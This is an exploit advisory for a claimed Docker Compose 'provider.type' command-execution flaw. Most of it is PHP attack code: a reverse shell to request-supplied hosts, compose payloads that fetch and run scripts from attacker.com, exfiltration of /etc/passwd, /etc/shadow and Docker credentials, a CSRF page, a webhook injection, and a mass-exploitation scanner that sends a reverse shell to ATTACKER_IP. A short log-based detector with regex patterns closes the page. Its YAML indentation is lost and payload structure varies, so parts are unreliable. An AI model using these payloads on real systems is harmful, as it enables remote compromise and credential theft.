=============================================================================================================================================
| # Title : Docker Compose v 2.40.3 Provider Type PHP Command Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://docs.docker.com/compose/releases/prior-releases/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212673/ &
[+] Summary : Docker Compose Provider Type Command Execution is a critical vulnerability (CVE pending) that allows arbitrary command execution
on the host when Docker Compose processes a Compose file containing the provider.type field. It exists because Docker Compose runs
whatever binary or script is named in provider.type on the host, without validating or isolating it.
[+] POC :
1. Creating malicious files via PHP
Example: A PHP page generates malicious Docker Compose files
<?php
// exploit-docker-compose.php
// Shows how a web endpoint can turn a request parameter into a Compose file
// whose `provider.type` names a host binary. The facts a defender needs are
// visible below: the request value is base64-decoded and spliced verbatim into
// YAML, and the result is either echoed back or written under /tmp.
if (isset($_GET['cmd'])) {
// Request-controlled string; nothing validates it before interpolation.
$cmd = base64_decode($_GET['cmd']);
// Build the docker-compose.yml content. The nested YAML keys appear without
// indentation in this listing (likely lost in extraction).
$composeContent = <<<YAML
services:
exploit:
provider:
type: /bin/sh
command: -c "{$cmd}"
YAML;
// Fake provider script content (for alternative methods); assigned but not used in this branch.
$scriptContent = "#!/bin/sh\n{$cmd}\n";
header('Content-Type: text/plain');
echo $composeContent;
exit;
}
// Or save the files on the server.
if (isset($_POST['save_exploit'])) {
$composeContent = <<<YAML
services:
backdoor:
provider:
type: /tmp/exploit.sh
YAML;
// Provider script: a reverse shell to the host/port taken from the POST body.
// `lhost`/`lport` are read without isset(), so a request lacking them emits an
// undefined-array-key warning and leaves the string malformed.
$scriptContent = "#!/bin/sh\nbash -i >& /dev/tcp/{$_POST['lhost']}/{$_POST['lport']} 0>&1 &\n";
// Return values are unchecked; file_put_contents() returns false on failure.
// Host indicator: a web-server process writing /tmp/docker-compose.yml and
// /tmp/exploit.sh and then chmod-ing the latter to 0755.
file_put_contents('/tmp/docker-compose.yml', $composeContent);
file_put_contents('/tmp/exploit.sh', $scriptContent);
chmod('/tmp/exploit.sh', 0755);
echo "Files created!";
}
?>
2. Exploiting platforms that allow uploading Docker Compose files
Example: Exploiting a control panel that allows uploading YAML files
<?php
// file-upload-exploit.php
// Models the vulnerable server-side pattern: an uploaded (here, overwritten)
// Compose file is handed to `docker compose up` with no inspection of
// `provider.type`. The weakness is the unvalidated file plus shell_exec(),
// independent of the particular payload text.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['dockerfile'])) {
$uploadDir = '/var/www/uploads/';
// basename() only strips directory components; neither the extension nor the content is restricted.
$composeFile = $uploadDir . basename($_FILES['dockerfile']['name']);
// Simple file check (bypassable): only the success of the move is tested.
if (move_uploaded_file($_FILES['dockerfile']['tmp_name'], $composeFile)) {
// Malicious content written into the compose file, replacing the upload.
// The heredoc interpolates PHP variables, but `$(` does not start a PHP
// variable, so the `$(...)` sequences below reach the file literally.
// Nesting indentation appears to have been lost in this listing.
$maliciousContent = <<<YAML
services:
app:
image: nginx
provider:
type: /bin/sh
command: -c "wget http://attacker.com/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh"
db:
image: mysql
environment:
MYSQL_ROOT_PASSWORD: $(curl http://attacker.com/steal.php?data=$(cat /etc/passwd|base64))
YAML;
// Return value unchecked; false on write failure.
file_put_contents($composeFile, $maliciousContent);
// Try to run docker compose (if permissions allow). $uploadDir is constant
// here, but it is interpolated unquoted into the shell string; with a
// request-derived path the same line would be a shell injection point.
if (isset($_POST['auto_run'])) {
$output = shell_exec("cd $uploadDir && docker compose up -d 2>&1");
// Raw command output is echoed without htmlspecialchars().
echo "<pre>Output: $output</pre>";
}
}
}
?>
<!-- Upload form for the handler above; the auto_run checkbox enables the shell_exec() branch. -->
<form method="POST" enctype="multipart/form-data">
Upload Docker Compose: <input type="file" name="dockerfile">
<br>
Auto-run: <input type="checkbox" name="auto_run">
<br>
<input type="submit" value="Upload">
</form>
3. Exploiting API endpoints that interact with Docker
Example: Injecting commands into an API that manages Docker containers
<?php
// api-exploit.php
// Simulated Docker API endpoint (server half), followed by a client that posts
// to it. The server half shows the vulnerable pattern: a JSON body is turned
// into YAML and passed to `docker compose` without checking `provider.type`.
if (isset($_POST['compose_config'])) {
// json_decode() returns null on malformed input; nothing checks for that here.
$config = json_decode($_POST['compose_config'], true);
// Weak point: provider.type is never validated.
// yaml_emit() is provided by the PECL yaml extension, not core PHP.
$yamlContent = yaml_emit($config);
// Save to a temporary file; tempnam() chooses the name, so it is not request-controlled.
$tempFile = tempnam('/tmp', 'docker_');
file_put_contents($tempFile, $yamlContent);
// Run the command (with whatever privileges the PHP process has).
// $tempFile is interpolated unquoted into the shell string.
$output = shell_exec("docker compose -f $tempFile up 2>&1");
// Cleanup (may not run if the command fails or hangs; shell_exec() blocks until exit).
unlink($tempFile);
echo json_encode(['output' => $output]);
exit;
}
// Exploitation payload (client half). Note `command` sits at the service level
// here, beside `provider`, whereas the other snippets on this page nest it
// under `provider`; which placement Compose honors is not established here.
$payload = [
'services' => [
'malicious' => [
'provider' => [
'type' => '/bin/sh'
],
'command' => '-c "echo pwned > /tmp/hacked && cat /etc/shadow | base64 > /tmp/stolen"'
]
]
];
// Send the request. Without CURLOPT_RETURNTRANSFER, curl_exec() prints the
// response and returns a bool; $response is assigned but never inspected.
$ch = curl_init('http://target.com/api/docker/deploy');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'compose_config' => json_encode($payload)
]);
$response = curl_exec($ch);
curl_close($ch);
echo "Attack sent!";
?>
4. CSRF + Docker Compose Exploit
Example: Exploiting CSRF in the Docker Administrator Interface
<?php
// csrf-exploit.html (hosted on the attacker's server)
// The PHP tags wrap plain HTML/JS; nothing server-side happens in this file.
?>
<html>
<body>
<script>
// CSRF against a Docker Compose deploy endpoint.
// Defender note: a cross-origin fetch() with Content-Type: application/json is
// not a "simple" request, so the browser sends a CORS preflight first and the
// POST only reaches the endpoint if its CORS policy allows it. The GET via the
// <img> below has no such barrier. A CSRF token (or SameSite cookies) on
// state-changing deploy routes is the actual mitigation.
fetch('http://victim.com/docker/deploy', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
// Template literal; the nested YAML indentation appears lost in this listing.
body: JSON.stringify({
name: 'innocent-app',
compose: `services:
innocent:
image: nginx
provider:
type: /bin/bash
command: -c "curl http://attacker.com/steal.sh | bash"
backup:
image: busybox
command: sh -c "cat /var/lib/docker/config.json | base64 | curl -X POST -d @- http://attacker.com/log"`
})
});
</script>
<!-- GET with side effects through an image tag; onload only fires if the response decodes as an image.
     An endpoint that accepts a remote URL in `file=` is itself a finding, separate from provider.type. -->
<img src="http://victim.com/docker/deploy?action=up&file=http://attacker.com/malicious-compose.yml" onload="alert('Exploited')">
</body>
</html>
5. Mass Exploitation Scanner
A scanner that searches for servers vulnerable to this issue.
<?php
// docker-scanner.php
class DockerComposeScanner {
// Base URLs to probe; filled by addTarget().
private $targets = [];
// Register a base URL; no normalisation or validation is performed.
public function addTarget($url) {
$this->targets[] = $url;
}
// Probe each registered target in insertion order.
public function scan() {
foreach ($this->targets as $target) {
$this->testVulnerability($target);
}
}
// Test 1: direct file upload. Posts a Compose file whose provider is /bin/echo
// with a marker argument, then looks for the marker in the response.
// Detection indicator: a multipart upload named docker-compose.yml to /upload
// containing `type: /bin/echo` / `command: VULNERABLE`.
private function testVulnerability($url) {
$testCompose = tempnam(sys_get_temp_dir(), 'test_');
// Nested YAML indentation appears lost in this listing.
$maliciousContent = <<<YAML
services:
test:
provider:
type: /bin/echo
command: VULNERABLE
YAML;
file_put_contents($testCompose, $maliciousContent);
// Try to upload to the target (multipart/form-data via CURLFile).
$ch = curl_init($url . '/upload');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'file' => new CURLFile($testCompose, 'text/yaml', 'docker-compose.yml')
]);
// curl_exec() returns false on transport failure; that case is not handled.
$response = curl_exec($ch);
if (strpos($response, 'VULNERABLE') !== false) {
$this->log("VULNERABLE: $url");
$this->exploit($url);
}
// The curl handle is never curl_close()d; only the temp file is removed.
unlink($testCompose);
}
// Full exploitation: JSON POST to /api/deploy with a provider that decodes and
// runs a reverse shell to the placeholder ATTACKER_IP:4444. The response is ignored.
private function exploit($url) {
$reverseShell = base64_encode('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1');
$payload = [
'compose' => <<<YAML
services:
exploit:
provider:
type: /bin/bash
command: -c "echo $reverseShell | base64 -d | bash"
YAML
];
// Send the payload.
$ch = curl_init($url . '/api/deploy');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_exec($ch);
}
// Append a timestamped line to scan.log in the current working directory and echo it.
private function log($message) {
file_put_contents('scan.log', date('Y-m-d H:i:s') . " - $message\n", FILE_APPEND);
echo "$message\n";
}
}
// الاستخدام
// Usage: register the targets, then run one scan pass over them.
$scanner = new DockerComposeScanner();
foreach (['http://target1.com', 'http://target2.com'] as $targetUrl) {
    $scanner->addTarget($targetUrl);
}
$scanner->scan();
?>
6. Webhook Exploitation
Exploiting webhooks that launch Docker Compose
<?php
// webhook-exploit.php
// Handle a webhook from GitHub/GitLab/etc.
// Models a deploy hook that clones whatever repository the webhook names and
// runs its docker-compose.yml. Two server-side weaknesses are visible: the
// webhook is never authenticated (no shared secret or signature check), and
// the clone URL from the JSON body is interpolated unquoted into a shell command.
$payload = json_decode(file_get_contents('php://input'), true);
if (isset($payload['ref'])) {
// Simulated deploy script.
// Taken directly from the request body; these keys are not isset()-checked.
$repoUrl = $payload['repository']['clone_url'];
// Clone the repository (may contain malicious files).
// uniqid() is time-based rather than random, so the directory name is predictable.
$cloneDir = '/tmp/repo_' . uniqid();
// Shell injection point that is independent of Compose: $repoUrl is not escaped.
shell_exec("git clone $repoUrl $cloneDir");
// Run docker compose if present.
if (file_exists("$cloneDir/docker-compose.yml")) {
// Executes whatever the repository's Compose file names in provider.type.
shell_exec("cd $cloneDir && docker compose up -d");
// Cleanup (may fail if a background process still holds the directory).
shell_exec("rm -rf $cloneDir");
}
// Or inject a malicious file. This runs regardless of whether the clone
// succeeded, and after the rm -rf above, so $cloneDir may no longer exist.
// Nested YAML indentation appears lost in this listing.
$injectedCompose = <<<YAML
services:
web:
image: nginx
provider:
type: /bin/sh
command: -c "curl http://attacker.com/c2.php?host=$(hostname) | bash"
YAML;
file_put_contents("$cloneDir/docker-compose.yml", $injectedCompose);
// Foreground `up` (no -d) blocks this request until the services exit.
shell_exec("cd $cloneDir && docker compose up");
}
?>
Attack detection
PHP detection system:
<?php
// intrusion-detection.php
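class DockerIntrusionDetection {
    /** Log files inspected by monitor() when no list is given. */
    public const DEFAULT_LOGS = [
        '/var/log/docker.log',
        '/var/log/syslog',
        '/var/log/auth.log',
    ];

    /**
     * Regexes applied to each log line. These are the page's original
     * heuristics (literal `attacker`/`exploit` words, unanchored `.*` spans),
     * so treat a hit as a triage lead rather than proof of compromise.
     */
    public const DEFAULT_PATTERNS = [
        '/provider\.type.*(\/bin\/|\/tmp\/|\/dev\/)/',
        '/docker compose.*(curl|wget|bash|sh).*(attacker|exploit)/i',
        '/execution.*(compose|docker).*(provider|type)/i',
    ];

    /** Recipient of e-mail alerts. The value on the page is a placeholder; set it before deploying. */
    public const ALERT_RECIPIENT = '[email protected]';

    /**
     * Scan the given log files line by line and raise an alert for every
     * line that matches one of the patterns.
     *
     * Reads with fgets() instead of file_get_contents() so large logs are not
     * loaded into memory, and reports the matching line number and text so
     * the alert can be acted on. Missing or unreadable files are skipped, as
     * in the original.
     *
     * @param list<string> $logs     log file paths to inspect
     * @param list<string> $patterns PCRE patterns to test each line against
     * @return int number of alerts raised
     * @throws \RuntimeException if a pattern is invalid (see findMatches())
     */
    public static function monitor(array $logs = self::DEFAULT_LOGS, array $patterns = self::DEFAULT_PATTERNS): int {
        $alerts = 0;
        foreach ($logs as $log) {
            if (!is_file($log) || !is_readable($log)) {
                continue;
            }
            $handle = fopen($log, 'r');
            if ($handle === false) {
                continue;
            }
            try {
                $lineNumber = 0;
                while (($line = fgets($handle)) !== false) {
                    $lineNumber++;
                    foreach (self::findMatches($line, $patterns) as $pattern) {
                        $alerts++;
                        self::alert($pattern, $log, $lineNumber, rtrim($line, "\r\n"));
                    }
                }
            } finally {
                // Always release the handle, even if alert() throws.
                fclose($handle);
            }
        }
        return $alerts;
    }

    /**
     * Return the patterns that match one line of text.
     *
     * @param string       $line     the text to test
     * @param list<string> $patterns PCRE patterns
     * @return list<string> the matching patterns, in the order given
     * @throws \RuntimeException if preg_match() fails (invalid pattern or PCRE error);
     *         a broken pattern would otherwise silently disable detection
     */
    public static function findMatches(string $line, array $patterns = self::DEFAULT_PATTERNS): array {
        $matched = [];
        foreach ($patterns as $pattern) {
            $result = preg_match($pattern, $line);
            if ($result === false) {
                throw new \RuntimeException(sprintf('preg_match failed for pattern %s (PCRE error %d)', $pattern, preg_last_error()));
            }
            if ($result === 1) {
                $matched[] = $pattern;
            }
        }
        return $matched;
    }

    /**
     * Send an alert by e-mail and to syslog.
     *
     * @param string $pattern    the pattern that matched
     * @param string $log        the log file it matched in
     * @param int    $lineNumber 1-based line number of the hit (0 if unknown)
     * @param string $line       the matching line, included so the alert is triageable
     */
    private static function alert(string $pattern, string $log, int $lineNumber = 0, string $line = ''): void {
        $message = "DOCKER EXPLOIT DETECTED!\n";
        $message .= "Pattern: $pattern\n";
        $message .= "Log file: $log\n";
        if ($lineNumber > 0) {
            $message .= "Line: $lineNumber\n";
        }
        if ($line !== '') {
            $message .= "Match: $line\n";
        }
        $message .= "Time: " . date('Y-m-d H:i:s') . "\n";
        // Send the alert. mail() returns false when the message is not accepted
        // for delivery; record that so a silent mail failure does not hide the hit.
        if (!mail(self::ALERT_RECIPIENT, 'Security Alert - Docker Exploit', $message)) {
            syslog(LOG_WARNING, 'DockerIntrusionDetection: mail() failed for alert');
        }
        syslog(LOG_ALERT, $message);
    }
}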
// تشغيل المراقبة
DockerIntrusionDetection::monitor();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================